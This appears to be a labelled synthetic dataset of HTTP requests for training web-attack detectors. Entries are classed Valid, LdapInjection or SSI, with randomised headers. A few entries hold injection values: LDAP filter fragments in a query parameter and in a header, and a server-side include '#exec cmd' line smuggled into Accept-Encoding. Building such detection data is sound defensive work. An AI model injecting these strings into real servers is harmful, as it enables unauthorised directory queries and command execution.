Referer: /t8ae8iei.png
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.0 (X11; U; Linux i386 8.1; cm-dd; rv:1.9.6) Gecko/01130103
UA-CPU: MIPS
UA-Disp: 235,5238,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8806x127
Via: 0.3 192.65.87.51, 2.1 www.efeksh.jpg, HTTP/3.5 173.58.216.130
Transfer-Encoding: mhfsSt; ahszD=aL1lt
Upgrade: LFbi/3.6, snd/9.7
Warning: 884 212.15.147.145 "eeicrU" 
X-Forwarded-For: 53.249.194.126
X-Serial-Number: 3135796940
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1053
Start - Id: 21016
class: Valid
GET /sjPxPXStJEAlu8n/rnaDe/h_Mp/upassthruOa4bhtaccesrcp/let/-rd/Eeaauqni9tUstnbili/gO/fibh5Gc4vz1JrEVjvXiF.jpg?lnt8etHenfea=3nuWetp28sva5&7tzynyb=3810332 HTTP/1.0
Host: 64.115.189.67
Connection: 7otomei
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e9rid-80;q=0.3, ieoa-tesho7n;q=0.2, jhaow-mhl, le-ssuese
Cache-Control: tsnwhomd='o9ol'
Client-ip: 207.254.64.132
Cookie: soarail=c;tnmochan%tY;LdegmeItnueose6=oYaa;nfer0=5473
Cookie2: $Version="534"
Date: Fri, 05 Dec 08 15:01:53 UTC
ETag: "yS7jeWo.CP_ngWA"
Expect: esiontj=ri4dlbaa
From: hrtiet@tsotaco.it
If-Modified-Since: Fri, 25 Apr 08 09:06:28 CET
If-Unmodified-Since: Thu, 16 Apr 09 06:51:41 GMT
If-Match: "IdocP@gkIUqprnZEKS"
If-None-Match: *
If-Range: Wed, 18 May 05 15:12:46 CET
Max-Forwards: 7452
MIME-Version: 1.5
Pragma: ra3tshs='cxwdB'
Proxy-Authorization: Digest uri=/uoaaow/df49t/soboTieb/8h96.txt
Authorization: NTLM YWVlaWN4ZG9zMWFnZWF0dEdUaDczcGFmbmJzYWFycnpyZW4=
Range: 729-89313,-42549,64779-835298
Referer: http://www.hyoa.net/eoada/ubfdq/maaO/eCitb1.png
TE: gzip;q=0.7
Trailer: Pragma
User-Agent: bjmawh/0.7
UA-CPU: 68000
UA-Disp: 3926,7980,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 985x390
Via: HTTP/1.4 240.11.83.239:61, 1.9 www.hhrqmn.gif, 4.2 www.matH.html:52206
Transfer-Encoding: gzip
Upgrade: bhme/4.1, ran/8.6
Warning: 199 41.92.136.197 "leoay" "Wed, 13 Jan 10 14:08:26 CET"
X-Forwarded-For: 255.69.11.121
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21016
Start - Id: 38472
class: LdapInjection
GET /vinQ/V9cc_/sue5e2no/aLyqvE/eixfwzSv/_uIK4qarcopyP/wgcTooZBS0iBK_YuiT/ii.exe?ohl0K2CUJ7hsystem=hrcplink&conHTohbuhrh=etc+elc1n%29p&u3Asmoditclab=%29+++%28%7C%28+++cn%3D*o++++%27brien*+++%29%28mail+%3D*o+%27brien*+++%29++++&yni1aveT0vdDpcp=0wass&ito9cin=ssnna&ysn=988&tRcoieaa78tcAo=3anl+%29w HTTP/1.1
Host: www.aoyb4.cz
Connection: eieua
Accept: audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 179.45.115.137
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="554"
Date: Wed, 03 Jan 07 08:02:14 CET
ETag: W/"vEDWR6w_MB0Mrrjov"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: "YvDv9TrIFAa__EZrGJn"
If-None-Match: *
If-Range: Sun, 13 Dec 09 20:55:32 GMT
Max-Forwards: 6
MIME-Version: 6.7
Pragma: oWA=ifpt
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: NTLM ZWV0enVhYWJldW5seWV0cHRkcmZpcWRuZ2R0YmlYYXFBZXJnY2hFdHRuQUY=
Range: 24-,76759-,-19589
Referer: http://Nbcftev.biz/iacy0b/gfilg/biu7/otmyieet.png
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: Mozilla/1.6 (compatible; MSIE 8.9; Win 9x; ttike8t; nDmxen2aae)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: HTTP/8.2 www.esNa.jpg, HTTP/4.2 50.206.238.222, 1.4 77.17.13.166
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 863 www.oneLt.gif "lrRpIern" "Sun, 11 Oct 09 06:27:08 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38472
Start - Id: 22449
class: Valid
GET /aSx1-pWbkaYZVstIyM/taBQCsslqY4cv/oMaccess_logU_execWhtpassr/sD6t.MXi2hHUAD/lbvswSVkI.1DmqIN.dll?hM=ho&HstdiniTtqx=meoe0kxsucwso HTTP/1.0
Host: 224.2.109.35
Connection: e5irz
Accept: audio/basic;q=0.9, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 242.133.189.214
Cookie: eqsuee=J3ewgete;wbvI-wopenScmdf@=np;vehusden87d6u=ylraoffem3;ptnnisbem1ujq=ssihhgrdzeH~;lsaso=56852
Cookie2: $Version="31"
Date: Tue, 30 Aug 05 17:12:46 CET
ETag: "xa-zMNeKb3jW4Lg6"
Expect: gaEo
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Mon, 27 Dec 04 07:12:46 UTC
If-Unmodified-Since: Wed, 09 Feb 05 16:29:41 GMT
If-Match: "FCkl6VzU@y4m8K6N7Eq"
If-None-Match: *
If-Range: "B_NzBqrG5.zefSjO7mi3"
Max-Forwards: 0
MIME-Version: 7.7
Pragma: beeeeh=zO
Proxy-Authorization: Basic TzNkcjpsODF0VG8=
Authorization: NTLM Um1KeWZoYXZzaWZuYW1mT3NlZWlubTllb2hmMnRhc2NhZW4=
Range: -8,-142035
Referer: http://oeisn.biz/orka2sz/r6hhi/deeNocnl/axnII/zieyanne.tar
TE: trailers,trailers
Trailer: Expect
User-Agent: czd6as http://www.ewtta.org
UA-CPU: Sparc
UA-Disp: 8455,3550,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/2.4 81.234.64.42:68, sdsf4/4.6 www.y3gtz.html, eahhsm/0.1 www.eoz32ry.tiff
Transfer-Encoding: hgow
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22449
Start - Id: 629
class: Valid
GET /nw7Yc_pG-MKr9pQ6PBqE/oencesEtirgikogfieSo/aIe9EAR8azn7Qm.6dIW@/pi5p/o0/ee4Npsge2hrhesuar/htesus9sycesooei/tTvxis9r2CiNwNWNcO1/Uconnectmd/ewlSt95/a6dff54ccre.mspx? HTTP/1.0
Host: 199.212.71.157
Connection: keep-alive
Accept: application/zip
Accept-Charset: x-mac-arabic, x-mac-korean;q=0.0, x-mac-greek;q=0.7
Accept-Encoding: *
Accept-Language: oT5-seli;q=0.9, boieM-t;q=0.0, 9fsatu-pfeh;q=0.3, l-gmojt;q=0.4
Cache-Control: no-store
Client-ip: 196.106.7.43
Cookie: 5shpSEBIE=4cHd5zsnen~q;6eeoodfedAi=qicr;7xwd9nj=5314;te=484;vs=hi kmailt;aosQis=43
Cookie2: $Version="12"
Date: Sat, 22 Aug 09 18:04:11 CET
ETag: "t3_R8tNZtPZMq@5@O"
Expect: owRwMo
From: ystebe@hnBteRt6v.be
If-Modified-Since: Wed, 21 Apr 10 15:33:04 GMT
If-Unmodified-Since: Wed, 02 Sep 09 15:05:25 CET
If-Match: *
If-None-Match: *
If-Range: "W_4298vCsrO8.W@pE"
Max-Forwards: 6
MIME-Version: 1.8
Pragma: 9Qe='tt'
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM YmFrRGFlbnM0VEFldGhlaXRyaGFidHB0bm9leWVvNGZPMXg0ZGMzaDdhZHNlVA==
Range: 0-,76-659886
Referer: /cagir8il.asp
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: TE
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 4.3; cl-nr; rv:2.1.0) Gecko/21086828
UA-CPU: x86
UA-Disp: 2226,321,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1676x432
Via: 6.8 189.94.218.139, 9.2 www.utoEls.png:32
Transfer-Encoding: compress
Upgrade: las/2.0, lc8/2.6, oys/5.1
Warning: 148 www.lgd73e.png "ictnerAenruNu" 
X-Forwarded-For: 61.182.37.41
X-Serial-Number: 541499677250739
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 629
Start - Id: 40209
class: SSI
PUT /eihctl1iFsfupCgmd/Nuwoiq2/iKb-3OoFwacv3QByiYBj/ntdtEobOsdres1n8tyo.sh? HTTP/1.0
Content-Length: 250
Content-Language: a,esctf
Content-Encoding: deflate
Content-Location: http://aiwsew.st/sths/gAr0ene/dnyrzt3/sibcras/g2ons.swf
Content-MD5: ZTk4bmV1amhudGV0b25vbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 08:04:14 GMT
Last-Modified: Sun, 15 Jan 06 06:57:37 GMT
Host: www.h5uYd.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.6, x-mac-korean
Accept-Encoding: <!-- #exec     cmd="/bin/ls   -l     /home/da/nss"     -->
Accept-Language: rr-ieD;q=0.3, hztlvQi-l, hnLett-3hl;q=0.5
Cache-Control: no-cache
Client-ip: 126.112.53.52
Cookie: PdsS7ei4saasNne=i1E;iftSsbhMb3wy=KSehrlaeoNfshn;hN8i=eeftpurxmlvarel1e;mbu=420984;pAdew=sDZ3C
Cookie2: $Version="596"
Date: Sat, 01 Sep 07 01:16:33 GMT
Expect: pd6mI
If-Modified-Since: Thu, 24 Jul 08 24:04:24 UTC
If-Match: "v55mw5G-Nfhjw7pOVVD"
If-None-Match: "P2_nyij1TOtB8_5R6b"
Max-Forwards: 632
MIME-Version: 4.0
Proxy-Authorization: NTLM ZXIxbzFhb3RlZnRUdG1icm5sc2ZhNmEyMnVzZTgzaXdvaTNyZWJsMHNKaUE=
Authorization: Digest nc=F9cbE4bc
Referer: /sxsl.cfm
TE: trailers
User-Agent: lseace/8.2.2.4.5
UA-Pixels: 616x735
Via: HTTP/6.5 34.232.90.96, HTTP/1.4 50.68.35.230
Transfer-Encoding: nrGl; tssgce=rcon
Upgrade: up1ayn/2.8, dpmt/5.8, dheatr/8.8
X-Forwarded-For: 46.19.132.235
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ra=694&ebputhFqls=Q&9R8NZ1tD=40602121&ditptos6vbr=c eq0&dia=n c&aobreib5twl=171845&erteuphshotnd=id0amop&7etc.RbAvZQ7=cf&eankocds6a0naak=0&ge2aDaN55pOao2=ldTsostii&stesorh=vsZklrh9Nv&OU2yQ6=91983&wdoT5N=chtamailleee&To8wegNrvOcmol=0070891&A1eetjtSh=2

End - Id: 40209
Start - Id: 30655
class: Valid
GET /pD3T.tdcoI1pKut./s.kme/t9nysmze4t.htm?veeoiieecpt=275471&0tks9tpe=b2etcrrr&el9op=e5gbF&oj5dyiLc=whereaNkt&eU5e3rlt5yt=57093001&taneoe=nocaft&ijne=hl&Ntoni=167927&emlmemeoL3ndkkO=rBx3Womf&hc3ueuguiSan=fvoaz6imaos HTTP/1.1
Host: 12.61.138.198
Connection: yeorwayO
Accept: application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, identity, identity;q=0.2, compress;q=0.7, deflate;q=0.8
Accept-Language: r-tu, catiio-yuit, wUw-rlt, zsBi-1;q=0.3
Cache-Control: only-if-cached
Client-ip: 67.66.20.239
Cookie: dickhsex2epa=v.Ow;onsajr9dtebtt=776718;rp5tkenluc=sAPT;Iwkarm2=aEGk
Cookie2: $Version="79"
Date: Thu, 08 Mar 07 01:39:41 CET
ETag: W/"OEMvjLzec6uwHCPbV_"
Expect: fi1alor=b4fh
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Sat, 05 Apr 08 02:11:44 CET
If-Unmodified-Since: Sun, 08 Nov 09 22:40:13 GMT
If-Match: *
If-None-Match: "-w@D5114Ra9MVDk"
If-Range: Fri, 27 Apr 07 13:04:56 UTC
Max-Forwards: 733
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: dsoan 0sitr=Hnaoh
Authorization: 41Srw0 9ewK=3r14p7
Range: 0-,163-,68-6
Referer: /rhasd/Stdeams/BaIa6a.msf
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: on9uapda9Kvnil
UA-CPU: MIPS
UA-Disp: 251,682,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: identity
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 047 www.Vcie.gif:267 "ksqsddinwgeeW" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 472936518137
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30655
Start - Id: 30474
class: Valid
GET /ae-lw@0nu3jtCsCGKfz/iV1edpt/vhGjQ/aQSvqvX9pXI/jt/ymVzspjwn_4uCS6/1NNGMP8Zd6/Ke/shskntoNioaed2m6i0/iSnebciAr.png?tmsiAarieu=4839&pnpa=thP%3Ao%7E%28&g0laaAdb6=eap1yc&oZ3sLinph-childm_=arsopt8-insertphp+&needl=ttouhtti%5Ci%7E&eNae=tui&GRpdC4.Lb=staspEtmp+io+m1eg%7E2hns HTTP/1.0
Host: 60.11.102.92:48150
Connection: t6ttng
Accept: */*;q=0.2
Accept-Charset: x-mac-ce
Accept-Encoding: gzip, deflate, identity, identity;q=0.2
Accept-Language: *
Cache-Control: max-stale=53
Client-ip: 38.135.23.56
Cookie: i2ey3e=bho8eilgdtg@in;acilawArSnsT=32991;IaIeiooen=ejrebsoptk;audltgenzrdlr6=lesnw
Cookie2: $Version="618"
Date: Sat, 12 Jul 08 10:43:35 CET
ETag: "rknMKkaMPOSoo_M-m"
Expect: raohtlln
From: eashaooo@aFOseet.de
If-Modified-Since: Tue, 13 Sep 05 20:45:28 UTC
If-Unmodified-Since: Wed, 07 Sep 05 17:47:29 UTC
If-Match: *
If-None-Match: *
If-Range: "b1jN4YS3QnkP6nxK@7j"
Max-Forwards: 2673
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic cHRvMDA6ZHNhdG5j
Authorization: NTLM ZUJlbjV5UnE1MmVmb3plTGdubWFpZnNnM25ocG9FZUFyRGthbWl0czB1Z2E=
Range: 91843-5,671-2
Referer: /psiE3n/8prhdhn/sr5u8s/NBiLaq/upnphn.nsf
TE: trailers
Trailer: Authorization
User-Agent: inthenta (gKuga@Jz)
UA-CPU: x86
UA-Disp: 264,406,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 710x3564
Via: 3aji/7.2 www.oqrie.html
Transfer-Encoding: gzip
Upgrade: cjq9gf/9.4, lrylin/0.7
Warning: 817 212.234.225.102 "oabwt3sj6anocoi" "Sat, 09 Dec 06 19:18:18 GMT"
X-Forwarded-For: 216.219.0.201
X-Serial-Number: 839589841918771
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30474
Start - Id: 18110
class: Valid
GET /mcu3OD3ol.html? HTTP/1.1
Host: www.tAsal.gov:80
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.3, deflate
Accept-Language: sotoe8-hnhno;q=0.6, s-tsEs;q=0.4, iatA-tt8, tim6-droh
Cache-Control: no-cache
Client-ip: 237.7.182.56
Cookie: eohweodrOh=rt5nz6bura5Drca8a2
Cookie2: $Version="192"
Date: Wed, 22 Aug 07 21:00:44 CET
ETag: W/"fuXBEtERaZdePjWV"
Expect: 100-continue
From: oecjtte@aJits.ch
If-Modified-Since: Sat, 30 Jun 07 15:17:11 UTC
If-Unmodified-Since: Wed, 08 Oct 08 22:03:26 GMT
If-Match: *
If-None-Match: "4ILo@4PuYoeE@9f5jiMA"
If-Range: Sat, 25 Feb 06 03:52:38 GMT
Max-Forwards: 824
MIME-Version: 5.1
Pragma: a='cmel'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: 5t8b eeii9=drtEA1Cw
Range: -232
Referer: /anTtc/rsociyes/ett5ee/dasw3.txt
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/4.3 (compatible; ieeae; Open BSD i386; e3ssai5le; t2rne)
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 259x791
Via: HTTP/5.2 www.a5nyoSE.jpeg:9, ieiR/2.4 23.84.178.81, FTP/1.5 www.etoe.png
Transfer-Encoding: compress
Upgrade: easn/7.4, sssja/2.0, iqc/5.0
Warning: 285 108.191.36.249 "oeiebe4a" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 818072952381662681
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18110
Start - Id: 22056
class: Valid
GET /sqtdet5rx/eTa0asIt8k5N0/6script7q8njform/bttguwu/ebemlqnF/aeyiIJMB9ilQZW4O/ts/t6hmaA6oaeesoYmo4an/GiEJhmailSF/g_Hnull.cgi?tccay=8&0smxbdlsjtms=ou6&HUkVRp6_logS=%3Be%3CRl&Atro=0jDLRqPAEI2&q4ntetO3iswa=2&Ad=aLk9z&fvdew=0407752&lhtsti=AN%3ER&ewu3aor9VEengly=i+rep&andC8r.ja=+eor&etn=7l%28ci+&np_location=423&Lv=nm4N&es7Usoea=5234873&VY-divnu06R=5 HTTP/1.1
Host: 94.142.153.213
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: DOdars-oiema;q=0.3, eaanhR0e-p;q=0.1, eN-e5;q=0.8
Cache-Control: max-stale
Client-ip: 248.80.181.232
Cookie: laoa0niu46tahe=955;teOhyeISc=281436
Cookie2: $Version="469"
Date: Mon, 28 Feb 05 24:49:34 CET
ETag: "PRhB29SvGuHU61M9H"
Expect: uaou
From: rnoHSnss@agsartc.de
If-Modified-Since: Fri, 02 Dec 05 24:00:01 UTC
If-Unmodified-Since: Thu, 31 Aug 06 14:04:29 GMT
If-Match: "cNLLVmUJbiu9CTD80S"
If-None-Match: "i-vqP8U1nVSCAvpTI"
If-Range: "YvyCoFGxl22XpsiP"
Max-Forwards: 2553
MIME-Version: 0.3
Pragma: 1ht='cgepieno'
Proxy-Authorization: NTLM NmdkZURlYmZoZW90emdNdHpkcmVmN3NoaWhzeWlvdHJ0
Authorization: Digest cnonce="tseeiooe"
Range: 5-448267
Referer: /Ai75zg/kkaMSh/Treeogh/rnaseeRl/nERrEa.jpg
TE: trailers,deflate,gzip
Trailer: TE
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 3.7; tu-ne; rv:2.6.3) Gecko/20559968
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: HTTP/1.9 13.218.212.249:20, 6.3 www.M9dsnr.jpeg, 8.2 209.94.217.53
Transfer-Encoding: identity
Upgrade: ewHj/5.7
Warning: 377 253.201.21.135 "5jiuaat" "Mon, 24 Dec 07 17:02:15 GMT"
X-Forwarded-For: 30.171.197.154
X-Serial-Number: 10148622161169
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22056
Start - Id: 39032
class: LdapInjection
POST /amRaleOhiascsjeey.swf? HTTP/1.1
Content-Length: 215
Content-Language: wyeu,mastkh7
Content-Encoding: identity
Content-Location: http://xioa6.biz/nf0iaaaf/suxthB/qoVaa.dll
Content-MD5: SGFtcmpkbnBjMWRlZW5lMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jun 08 14:30:38 CET
Last-Modified: Fri, 17 Oct 08 14:56:40 GMT
Host: 73.239.255.179:9073
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 289)(&(objectClass=rr4h)(|(sn=  2sp)(cn=ncl    J*))
Cache-Control: no-store
Client-ip: 73.239.50.202
Cookie: WDcopyfD-=xM9W_LgrH
Cookie2: $Version="31"
Date: Wed, 02 Apr 08 11:03:14 CET
ETag: "m.zvaF9l0uX5MvZcQ"
Expect: 100-continue
From: 6eGtzO@aUa6ae0S.fr
If-Modified-Since: Wed, 15 Jul 09 06:17:50 CET
If-Unmodified-Since: Sat, 23 May 09 10:59:02 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Apr 06 12:43:13 GMT
Max-Forwards: 734
MIME-Version: 9.1
Pragma: oy9af='rpnA'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="vitaea"
Range: -0298
Referer: /npn3ama/rs6y/0uSro/vmg8.jsp
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/7.2 (compatible; nthjh3yhI; Open BSD i586; w1HE5k; aletno; fGueb5aeq)
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7332x461
Via: 5Uee/7.0 www.eTrnot.gif, HTTP/7.8 www.ufldWm2.tiff
Transfer-Encoding: deflate
Upgrade: ne66ft/5.8, ziI/5.3, ofii/1.2
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eatskIev=7etuC1pogun9xer&5e=oitaj&ehyhhve=7&EMrwerahM=hSs\oi=uldEo<=&@p9mW=onsoanmnces&asotr3ooAlN=5snph-t&4dEdenlZltyssde=axS&ieuthm=yeT_5CLxUJ&7axeeyo=wtoidwc6siy5jelas&Anoreaseiel=c-chtw %&bhdaah=121736

End - Id: 39032
Start - Id: 17767
class: Valid
GET /tauspaite3ntehein7/e3y/FAaN/4passwdR3/nW9FdZo1e9cLyQXlR/nOohrhbjed3c0a/sea4styn/rccVfG0mTCWyK/2NdaceaE6bndpOoP9sD/Ea0rroa7eujtlsqeqi/nomyhHy3zhNeep.shtml?4tbensea=toc%2F%3F&reacowrvqh0ozge=dCFQt1ldzt HTTP/1.1
Host: www.osIianen5n.cz
Connection: 0lnhjIdr
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.9, identity;q=0.7, compress;q=0.9
Accept-Language: *
Cache-Control: eu9rr='eaeucre'
Client-ip: 28.227.18.202
Cookie: gegrcizl7nae=441;wWcieyteyd1tc=53;Dshiisae=gsrdocumentPIp nesonw;ra=rJahanaaa;4__likeY7qKUf=ddo6Uz1YrOb;ssdafEtLeiTegsl=8oaxOc77
Cookie2: $Version="6"
Date: Fri, 30 Jun 06 19:29:11 CET
ETag: "edr_vKqPDo9AhhSxQ9vu"
Expect: 100-continue
From: 0D8aoioi@bieedfc.uk
If-Modified-Since: Mon, 09 Feb 04 16:42:40 CET
If-Unmodified-Since: Mon, 11 Apr 05 18:13:29 CET
If-Match: "gcXcZEsc1pc-a.Pmu"
If-None-Match: *
If-Range: Thu, 24 May 07 03:04:32 UTC
Max-Forwards: 8782
MIME-Version: 5.6
Pragma: 8tattsdh=esDmrnlg
Proxy-Authorization: Digest opaque="tmvEti"
Authorization: Basic YWV0bGVPNjpsZ2VvYw==
Range: 27-
Referer: http://www.tiTso.fr/ciuleis/ehsrab/ueYeitm.htm
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.5 (Windows; U; Win98 6.0; i4-he; rv:2.7.0) Gecko/27636908
UA-CPU: x86
UA-Disp: 192,3054,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 582x198
Via: HTTP/0.4 www.zecude.shtml, FTP/0.3 www.goaucweT.jpg
Transfer-Encoding: owatu6; ymret=eawco
Upgrade: hrjjsa/6.3, slosri/3.8, i8y/4.8, vli8r/7.4
Warning: 923 www.tcRf.css:85831 "OacwtAoru" 
X-Forwarded-For: 105.19.29.209
X-Serial-Number: 197606037
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17767
Start - Id: 29226
class: Valid
GET /3pS/oeaaeaiRthl2o5ma.png? HTTP/1.0
Host: www.Uvelmie53.biz
Connection: close
Accept: text/xml
Accept-Charset: windows-1252;q=0.7
Accept-Encoding: 
Accept-Language: 2llea-o, u-tla8al;q=0.5, y-b9siu
Cache-Control: no-cache
Client-ip: 245.22.214.190
Cookie: son=+i);childmUIZxi=2iooatrano1eim;AT8C9Y4@sam=48741817;eyc5ta=tfm
Cookie2: $Version="37"
Date: Tue, 23 Sep 08 17:18:24 UTC
ETag: W/"_79KBLCbMEr9hF_YXqfT"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Sun, 29 Nov 09 21:56:02 CET
If-Unmodified-Since: Thu, 01 Sep 05 18:30:12 GMT
If-Match: "UUd.6C-aXcD286CZ3YQ"
If-None-Match: "XDZ@PKLaEkP-v39cJ"
If-Range: *
Max-Forwards: 506
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: NTLM aGloc2NnZUlhNXJUbXVldGFlcmFib2FFb2J6cmxpMWl5ZG9uaA==
Range: -2
Referer: /uatcerz/cRttfmai/tfU8tee/aoexrr.bin
TE: gzip;q=0.2,chunked;q=0.7
Trailer: Accept-Charset
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 4.1; aI-rt; rv:1.7.8) Gecko/60583142
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 200x896
Via: 1.9 51.36.26.205, FTP/4.6 190.194.103.247
Transfer-Encoding: identity
Upgrade: meof/2.8, noaa/9.9, smaese/4.8
Warning: 332 146.198.222.127 "sgnyiw" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29226
Start - Id: 6531
class: Valid
PUT /hriscpo5tpxthaakt5is/yachildR6iframemy8UlinkO.js? HTTP/1.0
Content-Length: 222
Content-Language: huhtuece,iioienod
Content-Encoding: gzip
Content-Location: http://www.rkfu.it/trRpnis/xfEonES/hlfin/seko/ijiE.nsf
Content-MD5: bGFlbnJzTmVwc2FoY3RrYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Jun 05 07:32:09 CET
Last-Modified: Sun, 06 Apr 08 08:54:13 UTC
Host: 29.103.36.184
Connection: padr2
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: igaebei-iey, lz-urudot, rnlgasso-Agvho96n;q=0.9, Nrn-is0st, atctRt-upe
Cache-Control: max-stale=54033
Client-ip: 237.134.153.1
Cookie: v1xowaubl3ilOoA=oeaotbo1plrndsove;aeedyie=<'7 r;inocnoayilo=samSnph-nRmi':k%'
Cookie2: $Version="99"
Date: Mon, 16 Jun 08 08:08:36 UTC
ETag: "iBAjS8ZamrXv_me7ZDQf"
Expect: 100-continue
From: nmBB@dotp8fner.fr
If-Modified-Since: Tue, 18 Sep 07 06:41:01 CET
If-Unmodified-Since: Sat, 18 Feb 06 17:53:43 GMT
If-Match: *
If-None-Match: "jlm2b2K6agVzDJygno."
If-Range: *
Max-Forwards: 6461
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM MlBlcnlpUGVlbnRlaWZhaGlhNG91YWVvZGhhaVNuYjI=
Range: 6-51,-360
Referer: http://EtsgN.net/fnoo/it44t3/mulazham/te7r6zes.htm
TE: deflate
Trailer: Via
User-Agent: avpdseeo (xDuyDWO; uI5t8r; j5YBHh)
UA-CPU: Sparc
UA-Disp: 623,166,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 578x446
Via: 3.6 www.y8elhd.png:14208
Transfer-Encoding: itdda; i9lat=yaiqnkd
Upgrade: CltItd/4.4, eota/2.4, mra/4.2, e8S/6.9
Warning: 576 www.dregtr.js "wwveagtyu8dT9b" 
X-Forwarded-For: 123.178.111.60
X-Serial-Number: 26536744388
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

